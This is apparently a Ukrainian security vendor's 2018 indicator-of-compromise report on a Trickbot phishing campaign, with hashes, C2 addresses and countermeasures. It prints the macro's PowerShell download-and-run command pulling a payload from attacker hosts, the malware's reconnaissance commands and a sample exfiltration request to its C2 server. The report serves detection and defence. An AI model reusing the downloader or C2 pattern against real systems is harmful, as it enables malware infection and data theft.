Archive | 17/06/2018

IOC_Trickbot_110618

Доброго ночі, панове.

Перепрошую, що турбую в неробочий час, але інформація важлива.

В минулий понеділок, 11го числа, після обіду походила розсилка документів з макросами,

активація яких призводила до інфікування систем трояном типу #Trickbot.

Ми отримали зразок фішингового листа від однієї з компаній лише кілька годин тому:

Приманка досі функціонує, а основне тіло активно передає інформацію з інфікованих систем.

Шість днів поспіль вони продовжують збирати інформацію.

Так, уже майже усі антивіруси внесли і документ і payload в свої сигнатури.

Але ми дбаємо про вас, тому вирішили надати звіт із маркерами щоб ви могли пересвідчитися, що ваші системи ця зараза оминула.

Нагадую, що #Trickbot є модульним ШПЗ, яке використовується для збору даних та стеження.

Може довантажувати різні модулі для шифрування або віддаленого керування.

Рівень загрози, для організацій котрі не блокують макроси та не контролюють PowerShell і створення .exe, – високий.

А для тих, хто уважно читає наші поради – низький.

На що треба звернути увагу:

  • Один із серверів, що розповсюджує частини malware досі активний
  • Завантаження payload силами powershell через його виклик з cmd
  • Шлях та ім’я з яким записується і запускається downloader чітко вказані (not random)
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Виконання проходить із затримкою ~2-3 хв
  • Зразок не зачищає за собою файли у %temp% після міграції в %apdata%
  • Перевірку IP та звернення до Windows Update здійснює процес Oeuin_r.exe
  • Зразок також довантажує з windowsupdate.com кореневі сертифікати
  • А от передача зібраних даних уже через інжектований svchost
  • Прав Адміністратора не потребує

І так, проблеми будуть у тих, хто:

  • Не блокують макроси (90% державних установ)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • Не заборонили мережевий трафік для powershell (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

 Схема атаки:

Email attach (.doc) > macro > cmd > powershell > 2 URL > GET no.bin > %temp%\Oeuin_r.exe

Маркери IOC:

документ

SHA-256        5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
File name   75812277127A00113A.doc
File size      69 KB

Макрос містить 2 URL:

h11p:\onetimewonders{.} com/no.bin    (!) досі активний

h11p:\nepalhiking{.} com/no.bin           (404) файл вже видалено

сновна частина

SHA-256    503c5c3cb68e1e057df4b99fe338d65d44d4c6e1f49396929d3fff66044505af
File name   no.bin       >> %temp%\Oeuin_r.exe        !This program cannot be run in DOS mode.
File size      338 KB

Відкриває з’єднання із С2

h11p\188.124.167.132:8082/ser0611/hostname.UID

Активність по процесам:

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde

"C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function mhioxqxcz1([String] $lcambw5)

{(New-Object System.Net.WebClient).DownloadFile($lcambw5,''C:\tmp\Oeuin_r.exe'');

Start-Process ''C:\tmp\Oeuin_r.exe'';}try{mhioxqxcz1(''h11p\onetimewonders{.} c0m/no.bin'')}catch{mhioxqxcz1(''h11p\nepalhiking{.} c0m/no.bin'')}'""

| Out-File -encoding ASCII -FilePath C:\tmp\wcwwirbmn.bat;Start-Process 'C:\tmp\wcwwirbmn.bat' -WindowStyle Hidden"

C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\wcwwirbmn.bat" "

PowerShell  "function mhioxqxcz1([String] $lcambw5){(New-Object System.Net.WebClient).

DownloadFile($lcambw5,'C:\tmp\Oeuin_r.exe');

Start-Process 'C:\tmp\Oeuin_r.exe';}try{mhioxqxcz1('h11p\onetimewonders{.} c0m/no.bin')}catch{mhioxqxcz1('h11p\nepalhiking{.} c0m/no.bin')}

"C:\tmp\Oeuin_r.exe"

C:\Users\operator\AppData\Roaming\coplane\Oeuin_s.exe

C:\Windows\system32\svchost.exe

Збір інформації вбудованими засобами ОС:

C:\Windows\system32\cmd.exe /c ipconfig /all

C:\Windows\system32\cmd.exe /c net config workstation

C:\Windows\system32\cmd.exe /c net view /all

C:\Windows\system32\cmd.exe /c net view /all /domain

C:\Windows\system32\cmd.exe /c nltest /domain_trusts

C:\Windows\system32\cmd.exe /c nltest /domain_trusts /all_trusts

Закріплення через планувальник задач:

\MsWinToken      c:\users\operator\appdata\roaming\coplane\oeuin_s.exe        11.06.2018 10:46

Мережеві IOC:

Завантаження основного тіла:

68.65.120.85      onetimewonders{.} c0m       GET /no.bin HTTP/1.1

Перевірка Public IP:

216.239.32.21    ipinfo.io     GET /ip      HTTP/1.1    Mozilla/5.0

Комунікація з Windows Update (довантаження кореневих сертифікатів):

91.223.19.232    www.download.windowsupdate.com       GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1   Microsoft-CryptoAPI/6.1

Трафік інфікованої системи:

svchost.exe 2948 TCP   216.239.32.21    80     ESTABLISHED

svchost.exe 2948 TCP   200.111.167.227 449   ESTABLISHED

svchost.exe 2948 TCP   91.223.19.232    80     ESTABLISHED

svchost.exe 2948 TCP   37.230.113.54    447   ESTABLISHED

svchost.exe 2948 TCP   200.111.167.227 449   ESTABLISHED

svchost.exe 2948 TCP   65.30.201.40      443   SYN_SENT

Передача інформації про інфіковану систему:

188.124.167.132:8082         POST /ser0611/hostname_UID HTTP/1.1 test

А тепер саме головне – яку інформацію отримують нападники:

POST /ser0611/APM11_W617601.66340B99AFAFEB9431CE688A2D6B8FF8/90 HTTP/1.1

Content-Type: multipart/form-data; boundary=Arasfjasu7

User-Agent: test

Host: 188.124.167.132:8082

Content-Length: 4941

Cache-Control: no-cache

–Arasfjasu7

Content-Disposition: form-data; name=”proclist”

 

***PROCESS LIST***

[System Process]

System

smss.exe

csrss.exe

wininit.exe

csrss.exe

winlogon.exe

services.exe

lsass.exe

lsm.exe

–Arasfjasu7

Content-Disposition: form-data; name=”sysinfo”

 

***SYSTEMINFO***

Host Name – APM11

OS Name – Microsoft Windows 7 ……………………..

OS Version – Service Pack 1

OS Architecture – 64-bit

Product Type – Workstation

Build Type – Multiprocessor Free

Registered Owner – operator

Registered Organization –

Serial Number – 55041-007-1767687-86688

Install Date – 30/12/1899 00.00.00

Last Boot Up Time – 30/12/1899 00.00.00

Windows Directory – C:\Windows

System Directory – C:\Windows\system32

Boot Device – \Device\HarddiskVolume1

Total Physical Memory – 3651 Mb

Available Physical Memory – 3651 Mb

/c ipconfig /all

Ethernet adapter eth0:

….

/c net config workstation

…… ………………..                                \\APM11

………… …… ………………..                         APM11

…… ……………………                              operator

/c net view /all

.. ………… …… ……………….

/c net view /all /domain

.. ………… …… ……………….

/c nltest /domain_trusts

…. ………….. …………………. ………….. …………: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

/c nltest /domain_trusts /all_trusts

…. ………….. …………………. ………….. …………: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

–Arasfjasu7–

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування несанкціонованої доставки запускних на рівні Web та Email шлюзів
  • Перевірка каталогів
    • %temp%\Oeuin_r.exe
    • %temp%\wcwwirbmn.bat
    • %appdata%\coplane\Oeuin_s.exe
  • Перевірка планувальника системи на наявність задачі \MsWinToken         c:\users\%жертва%\appdata\roaming\coplane\oeuin_s.exe
  • По можливості – відмова від макросів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell та виконання кодованих команд – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR